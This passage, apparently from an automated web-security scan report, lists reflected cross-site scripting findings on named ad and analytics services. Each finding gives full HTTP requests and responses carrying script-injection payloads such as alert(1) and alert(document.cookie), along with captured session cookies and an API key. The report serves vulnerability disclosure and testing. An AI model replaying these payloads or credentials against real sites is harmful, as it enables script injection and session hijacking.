Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E90BDFAA65B881BE49A3F4A3B6F17540; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:11:10 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
SE_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_2896694b45f<script>alert(1)</script>40dfedbedff".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_2896694b45f<script>
...[SNIP]...

2.10. http://api.ipinfodb.com/v2/ip_query_country.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.ipinfodb.com
Path:   /v2/ip_query_country.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d7a63<script>alert(1)</script>e533171dea4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/ip_query_country.php?key=bff296a072906f8d56628b8f4c453c6189ed3da638db5981b97732bb86d0129a&output=json&timezone=false&callback=visitorGeolocation.setGeoCookied7a63<script>alert(1)</script>e533171dea4 HTTP/1.1
Host: api.ipinfodb.com
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:31:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 176
Content-Type: text/json; charset=UTF-8

visitorGeolocation.setGeoCookied7a63<script>alert(1)</script>e533171dea4(
{
"Ip" : "173.193.214.243",
"Status" : "OK",
"CountryCode" : "US",
"CountryName" : "United States"
}
)

2.11. http://api.ipinfodb.com/v2/ip_query_country.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.ipinfodb.com
Path:   /v2/ip_query_country.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 65179<script>alert(1)</script>2e96d59bfcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/ip_query_country.php?key=bff296a072906f8d56628b8f4c453c6189ed3da638db5981b97732bb86d0129a&output=json&timezone=false&callback=visitorGeolocation.setGeoCo/65179<script>alert(1)</script>2e96d59bfcfokie HTTP/1.1
Host: api.ipinfodb.com
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:31:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 177
Content-Type: text/json; charset=UTF-8

visitorGeolocation.setGeoCo/65179<script>alert(1)</script>2e96d59bfcfokie(
{
"Ip" : "173.193.214.243",
"Status" : "OK",
"CountryCode" : "US",
"CountryName" : "United States"
}
)

2.12. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload c3faf<script>alert(1)</script>fbf7af21dea was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7c3faf<script>alert(1)</script>fbf7af21dea&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:20 GMT
Date: Fri, 01 Apr 2011 18:17:20 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7c3faf<script>alert(1)</script>fbf7af21dea", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.13. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 239b5<script>alert(1)</script>62bdd952f2c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=239b5<script>alert(1)</script>62bdd952f2c&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"239b5<script>alert(1)</script>62bdd952f2c", c16:"", r:""});



2.14. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b1cdd<script>alert(1)</script>1daad3d2702 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888b1cdd<script>alert(1)</script>1daad3d2702&c3=2&c4=&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888b1cdd<script>alert(1)</script>1daad3d2702", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.15. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c9e4f<script>alert(1)</script>08282fdd351 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2c9e4f<script>alert(1)</script>08282fdd351&c4=&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2c9e4f<script>alert(1)</script>08282fdd351", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.16. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ab948<script>alert(1)</script>a35ddd47098 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=ab948<script>alert(1)</script>a35ddd47098&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"ab948<script>alert(1)</script>a35ddd47098", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.17. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload a8c59<script>alert(1)</script>cf2ea45f930 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=a8c59<script>alert(1)</script>cf2ea45f930&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"a8c59<script>alert(1)</script>cf2ea45f930", c6:"", c10:"", c15:"", c16:"", r:""});



2.18. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e1892<script>alert(1)</script>f5ea083f0b1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=e1892<script>alert(1)</script>f5ea083f0b1&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"e1892<script>alert(1)</script>f5ea083f0b1", c10:"", c15:"", c16:"", r:""});



2.19. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload a065c<script>alert(1)</script>581d91e7aaa was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-8825891582215045%26output%3Dhtml%26h%3D250%26slotname%3D9743825372%26w%3D300%26lmt%3D1301699500%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.quickyellow.com%252F%26dt%3D1301681500418%26bpp%3D2%26shv%3Dr20110324%26jsv%3Dr20110321-2%26prev_slotnames%3D8282812667%26correlator%3D1301681500450%26frm%3D0%26adk%3D3051422498%26ga_vid%3D1234146098.1301681501%26ga_sid%3D1301681501%26ga_hid%3D936317177%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1118%26bih%3D1004%26fu%3D0%26ifi%3D2%26dtd%3D145%26xpc%3DHEyqJzw6JK%26p%3Dhttp%253A%2F%2Fwww.quickyellow.com&uid=ZC45X9Axu6NOUFfX_289669a065c<script>alert(1)</script>581d91e7aaa&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=166308&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3FB1CE06E81EFF05A150AFF904264C8; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Fri, 01 Apr 2011 18:11:16 GMT

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669a065c<script>alert(1)</script>581d91e7aaa");

2.20. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4fb3'-alert(1)-'79dc16e5093 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..e4fb3'-alert(1)-'79dc16e5093&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIuCUQChgBIAEoATD4qtPsBBD4qtPsBBgA; sess=1; uuid2=4470455573253905340; anj=Kfw)mCZ#-r-!gzoh^Cqhjkv(+'n*Ar?/j9C?^6hwKS-6T#`5PBojYbRuf<Ll1I1_hYMhYeh%G6vYp*t5ODvAzTZ@iISJjXDc'nh[thoDjVDOn>OkjdhM-]kxuVc<-j^0E[S._]n?/-AkZL.5?T2G#A#U]+VwBupzlO^jt'sib/l$cNheGq(khOe'bw8d`euB.cj?qbq-gA!pj6^1%-h#Y:>8>-aA1s%>+2VKHUo:D4$wXYcPJa0pV6(yoKtkH4iSC7Y0![RCC#S9MDO7fT+LqQ2Bn!Cm+LoEJ1Rj9dTlZBSd-<H%U!v%'=cs)G=s5$$Fuh<-Uuf/c-H3lH#jqd6Oap3Jn<XaPzn`'kW8x490>]R9YwPWP84i@Tft^.$7hboq>5:RM_$2tI+t4y?]Wh$S3mfg$(rmoM+#rsOr%N_18#>u)Ad68T3rF<u@3GoUxqQuHeiMw`Mqgp3o`Lp^?sA:$+jr?'sLsp$GL52tA2rb_L7O9%tUm:mmr=Ma5rfGjl=`EA9k>54kg-mIfrsmD+)e>dAw+wgM1Z6.B++zP/-x-<YUx13AHx9m9EVCQ[0t>Lec_mi9=M5ckg9If?r2d=YvFi3W?kOv*'yK4EBNS-X-8(dO4`JtpvlG@^Em+X<s'_Bt4b*wzi%NN%0Y)2hh5+<oT@8?Dc@POarr%:v7cD'2OHF=bSuBlUCX?Nxf8N^Nh4>i5l%cKbE6+*6BP+`-(g2TYeYWq2wwO<::r`4Y

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 02-Apr-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)nCZ(]G)J7/O]F%-R2Z:f5>iQ*BYsWzvY8.)nH<$2.XWJWtjGv+4w]%yLG4BGFFn:P$AZ#Gz+-$TeEYm*.e'pf613v0MVm*_^3DJ=UIpYC@cXq-NpFHIkuVc<N=z-FiJ>g#l^L=JY]hp-mYdSLPGRC`g81EObM7iN.f%puar10yPY-[7]F9>i(B_A3PcZVmL-3uUR<*D:Qns%he1n7(1ZkiLgKp9q?U5$Ij`[VKooNc(D*%gjgqY9:!2[S.8mFdR^`1sGPsjV%G.tZzP+pC7Us+-Gmo'gHOO9VN]#I#>z$1O.0n0]FCI)%$irNtLYKGrLFm?FDH?kJHg+BL8j#t/3=LC`!k_10x0APpn$po_.%Qrn5LKaG+C:>+KYM0vexr#o3CPNpSS3kDk`leH`z(>e$g8?BhTnnjEm8JQCKDrol@l(u:QKVyn#'yiFkQ%d_+5c9>HA[f#/bkaeo7jYo1ntF*U'L(DV:gm_r3?R0pK7!>Tv<m$?W3RCIi/.ivIuiY(k1nU(`.z8Dj+=knZI=n]L=W?OG7<xts(:v/JJN_J+xBHp18UKoBo/f9tnWq6lZ`#sAsO(QR'fx#CerhiCJA+y5zwFJ5#.8wD((3pHou4zn%-.N6!/.qkDJsjN/f->S93^CKwybouKV%kLp#)1q.ZX-E+g*^mmMS.NzjYWVBukjw`z_T5).wO]n@%1hYVo>bCP78jEMPvt4wzX^D(M%?3m#wp)VawZvyQv7l4F6_lnT=.2<-wStTMc; path=/; expires=Thu, 30-Jun-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 01 Apr 2011 18:11:41 GMT
Content-Length: 1458

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAACAIEAAAAAAAIAgQAAA
...[SNIP]...
